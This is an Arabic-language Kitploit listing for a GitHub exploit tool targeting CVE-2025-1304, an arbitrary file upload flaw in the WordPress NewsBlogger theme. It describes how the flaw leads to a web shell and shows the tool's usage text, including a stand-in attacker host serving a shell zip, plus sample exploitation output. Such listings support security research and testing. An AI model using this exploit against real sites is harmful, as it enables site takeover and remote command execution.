Skip to content
KitploitKITPLOIT
أدواتعمليات الاستغلالالمدونة
Log in
إرسال
أدواتعمليات الاستغلالالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2025-1304 — إصدارات قالب WordPress NewsBlogger <= 0.2.5.1 عرضة لثغرة تحميل ملفات عشوائية. | Kitploit
أدوات/GitHubGitHub/nxploited/cve-2025-1304
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالتعلم والتعليم
GitHubnxploited/cve-2025-1304

CVE-2025-1304

إصدارات قالب WordPress NewsBlogger <= 0.2.5.1 عرضة لثغرة تحميل ملفات عشوائية.

عرض المستودع
22منذ سنة واحدةلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

🚨 قالب NewsBlogger لووردبريس <= 0.2.5.1 - رفع ملف تعسفي (CVE-2025-1304)

درجة CVSS: 8.8 (عالية)
نوع الثغرة: رفع ملف تعسفي
المكون: قالب ووردبريس
معرف CVE: CVE-2025-1304


🔥 نظرة عامة على الثغرة

قالب NewsBlogger لووردبريس (الإصدارات <= 0.2.5.1) معرض لـ رفع ملف تعسفي عبر لوحة الترحيب الخاصة بالمشرف.

تسمح هذه الثغرة لأي مستخدم مصادق — بما في ذلك أولئك الذين لديهم دور المشترك الأدنى — برفع أرشيف .zip ضار يحتوي على قشرة ويب.
يتم الرفع عبر حقل عنوان URL للمكون الإضافي غير المُتحقق منه، والذي يفشل في التحقق بشكل صحيح من محتوى أو نوع الملف المرفوع.

يمكن أن يؤدي الهجوم الناجح إلى اختراق كامل للموقع، بما في ذلك تنفيذ الأوامر عن بُعد وتصعيد الامتيازات.


🧠 تفاصيل البرنامج النصي

يقوم هذا البرنامج النصي بلغة Python بأتمتة استغلال الثغرة من خلال:

  • تسجيل الدخول باستخدام بيانات اعتماد المسؤول المقدمة.
  • استخراج nonce ديناميكيًا من صفحة الترحيب الضعيفة.
  • رفع مكون إضافي ضار عن بُعد عبر نقطة نهاية AJAX الضعيفة.

⚙️ تعليمات الاستخدام

python CVE-2025-1304.py -h
usage: a.py [-h] --url URL --username USERNAME --password PASSWORD --shellweb SHELLWEB

WordPress NewsBlogger Theme vulnerable to Arbitrary File Upload #By: Nxploited ( Khaled Alenazi )

options:
  -h, --help                show this help message and exit
  --url, -u URL             Target base URL (e.g., http://target/wordpress)
  --username, -un USERNAME WordPress admin username
  --password, -p PASSWORD   WordPress admin password
  --shellweb, -shell SHELLWEB
                           Direct URL to the malicious shell zip (e.g., http://attacker.com/shell.zip)

📤 مثال للإخراج

[+] Logging in to http://target/wordpress/wp-login.php
[+] Logged in successfully.
[+] Fetching welcome page to extract nonce: http://target/wordpress/wp-admin/admin.php?page=newsblogger-welcome
[+] Extracted nonce: 012818100b
[+] Sending malicious plugin URL to: http://target/wordpress/wp-admin/admin-ajax.php
[+] Server response:
{"success":true,"data":{"redirect_url":"http://target/wordpress/wp-admin/admin.php?page=newsblogger-welcome"}}

⚠️ إخلاء مسؤولية

هذا الكود مقدم لأغراض التعليم واختبار الأمان المصرح به فقط.
لا يتحمل المؤلف أي مسؤولية عن أي إساءة استخدام أو ضرر ناتج عن هذه الأداة.


بقلم: Nxploited (Khaled Alenazi)

تنزيل الأداة